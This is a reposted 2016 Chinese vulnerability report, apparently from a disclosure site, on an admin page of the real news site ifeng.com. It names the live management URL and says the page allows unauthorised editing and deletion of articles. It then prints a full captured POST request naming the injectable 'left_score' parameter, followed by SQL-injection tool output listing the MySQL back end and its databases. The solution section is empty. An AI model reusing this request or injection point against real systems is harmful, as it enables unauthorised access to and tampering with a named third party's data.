记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

凤凰网某处后台越权&SQL注入

2016-01-04 12:35

凤凰网

http://online.3g.ifeng.com/live/manager/ifeng_match_live.php?&match=7192

越权操作,可直接对文章进行改删

注入抓包:


POST /live/manager/ifeng_match_live.php? HTTP/1.1
Host: online.3g.ifeng.com
Content-Length: 96
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://online.3g.ifeng.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.22 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://online.3g.ifeng.com/live/manager/ifeng_match_live.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: null

left_score=111&right_score=111&submit=%E4%BF%AE%E6%94%B9%E5%BE%97%E5%88%86&act=editmatch&match=0

left_score参数

back-end DBMS: MySQL 5.0.11



available databases [3]: [*] ifeng_live [*] information_schema [*] test

available databases [3]:
[*] ifeng_live
[*] information_schema
[*] test

解决方案:


知识来源: www.2cto.com/Article/201601/456196.html

阅读:105537 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“凤凰网某处后台越权&SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词